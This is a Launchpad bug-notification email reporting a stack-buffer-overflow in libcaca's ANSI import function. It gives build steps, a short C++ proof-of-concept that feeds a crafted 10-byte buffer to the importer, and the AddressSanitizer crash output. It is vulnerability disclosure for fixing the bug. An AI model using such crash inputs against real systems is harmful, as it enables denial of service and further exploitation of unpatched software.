[Bug 1925467] Re: stack-buffer-overflow of text.c in function _import_ansi

xiao huang Thu, 22 Apr 2021 18:15:58 -0700

** Description changed:

  Hello ubuntu security team
+ 
+ issues: https://github.com/cacalabs/libcaca/issues/55
+ 
  System info：
  Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
  Fedora 33: clang 11.0.0 , gcc 10.2.1
  
  libcaca version e4968ba
  
  Verification steps：
  1.Get the source code of libcaca
  2.Compile the libcaca.so library
  
  $ cd libcaca
  $ ./bootstrap
  $ ./configure
  $ make
  or
  
  $ cd libcaca
  $ ./bootstrap
  $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g 
-fsanitize=address,fuzzer-no-link  -fsanitize-coverage=bb" CXX="clang++ -O2 
-fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link  
-fsanitize-coverage=bb"
  $ make
  3.Create the poc_ansi.cc && build
  
  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include <assert.h>
  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>
  #include <fstream>
  #include <iostream>
  
  using namespace std;
  
  void crash(const uint8_t *Data, size_t Size) {
  
-   if(Size<8) return ;
-   size_t len=0;
-   caca_canvas_t *cv;
-   cv = caca_create_canvas(0,0);
-   caca_create_frame(cv,0);
-   caca_set_frame(cv,0);
-   caca_import_canvas_from_memory(cv,Data,Size,"ansi");
-   caca_free_canvas(cv);
-   cv=NULL;
+   if(Size<8) return ;
+   size_t len=0;
+   caca_canvas_t *cv;
+   cv = caca_create_canvas(0,0);
+   caca_create_frame(cv,0);
+   caca_set_frame(cv,0);
+   caca_import_canvas_from_memory(cv,Data,Size,"ansi");
+   caca_free_canvas(cv);
+   cv=NULL;
  
  }
  
- 
  int main(int args,char* argv[]){
  
-         size_t  len = 0;
-         unsigned char buffer[] = 
{0x20,0x4a,0x0c,0x0a,0x20,0x0a,0x20,0x0c,0xc,0xc};
-         len = sizeof(buffer)/sizeof(unsigned char);
-         printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
-         crash((const uint8_t*)buffer,len);
+         size_t  len = 0;
+         unsigned char buffer[] = 
{0x20,0x4a,0x0c,0x0a,0x20,0x0a,0x20,0x0c,0xc,0xc};
+         len = sizeof(buffer)/sizeof(unsigned char);
+         printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
+         crash((const uint8_t*)buffer,len);
  
-         return 0;
+         return 0;
  
  }
  4.compile poc_ansi.cc
  
  clang++ -g poc_ansi.cc -O2 -fno-omit-frame-pointer -fsanitize=address  
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o poc_ansi
  5.Run poc_ansi
  asan info:
  
  =================================================================
  ==3763372==ERROR: AddressSanitizer: stack-buffer-overflow on address 
0x7ffda0164bea at pc 0x7f098d82c310 bp 0x7ffda01647b0 sp 0x7ffda01647a8
  READ of size 1 at 0x7ffda0164bea thread T0
-     #0 0x7f098d82c30f in _import_ansi 
/home/hh/Downloads/libcaca/caca/codec/text.c:391:38
-     #1 0x4c6c72 in crash(unsigned char const*, unsigned long) 
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
-     #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
-     #3 0x7f098d2780b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
-     #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_mbay+0x41c38d)
+     #0 0x7f098d82c30f in _import_ansi 
/home/hh/Downloads/libcaca/caca/codec/text.c:391:38
+     #1 0x4c6c72 in crash(unsigned char const*, unsigned long) 
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
+     #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
+     #3 0x7f098d2780b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
+     #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_mbay+0x41c38d)
  
  Address 0x7ffda0164bea is located in stack of thread T0 at offset 42 in frame
-     #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
+     #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
  
-   This frame has 1 object(s):
-     [32, 42) 'buffer' (line 31) <== Memory access at offset 42 overflows this 
variable
+   This frame has 1 object(s):
+     [32, 42) 'buffer' (line 31) <== Memory access at offset 42 overflows this 
variable
  HINT: this may be a false positive if your program uses some custom stack 
unwind mechanism, swapcontext or vfork
-       (longjmp and C++ exceptions *are* supported)
+       (longjmp and C++ exceptions *are* supported)
  SUMMARY: AddressSanitizer: stack-buffer-overflow 
/home/hh/Downloads/libcaca/caca/codec/text.c:391:38 in _import_ansi
  Shadow bytes around the buggy address:
-   0x100034024920: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
-   0x100034024930: f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2 f2 f2
-   0x100034024940: f2 f2 f8 f2 f2 f2 f8 f3 f3 f3 f3 f3 00 00 00 00
-   0x100034024950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x100034024960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x100034024920: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
+   0x100034024930: f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2 f2 f2
+   0x100034024940: f2 f2 f8 f2 f2 f2 f8 f3 f3 f3 f3 f3 00 00 00 00
+   0x100034024950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x100034024960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  =>0x100034024970: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00[02]f3 f3
-   0x100034024980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x100034024990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x1000340249a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x1000340249b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x1000340249c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x100034024980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x100034024990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x1000340249a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x1000340249b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x1000340249c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  Shadow byte legend (one shadow byte represents 8 application bytes):
-   Addressable:           00
-   Partially addressable: 01 02 03 04 05 06 07 
-   Heap left redzone:       fa
-   Freed heap region:       fd
-   Stack left redzone:      f1
-   Stack mid redzone:       f2
-   Stack right redzone:     f3
-   Stack after return:      f5
-   Stack use after scope:   f8
-   Global redzone:          f9
-   Global init order:       f6
-   Poisoned by user:        f7
-   Container overflow:      fc
-   Array cookie:            ac
-   Intra object redzone:    bb
-   ASan internal:           fe
-   Left alloca redzone:     ca
-   Right alloca redzone:    cb
-   Shadow gap:              cc
+   Addressable:           00
+   Partially addressable: 01 02 03 04 05 06 07
+   Heap left redzone:       fa
+   Freed heap region:       fd
+   Stack left redzone:      f1
+   Stack mid redzone:       f2
+   Stack right redzone:     f3
+   Stack after return:      f5
+   Stack use after scope:   f8
+   Global redzone:          f9
+   Global init order:       f6
+   Poisoned by user:        f7
+   Container overflow:      fc
+   Array cookie:            ac
+   Intra object redzone:    bb
+   ASan internal:           fe
+   Left alloca redzone:     ca
+   Right alloca redzone:    cb
+   Shadow gap:              cc
  ==3763372==ABORTING
  Thanks


-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1925467

Title:
  stack-buffer-overflow of text.c in function _import_ansi

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libcaca/+bug/1925467/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

[Bug 1925467] Re: stack-buffer-overflow of text.c in function _import_ansi

Reply via email to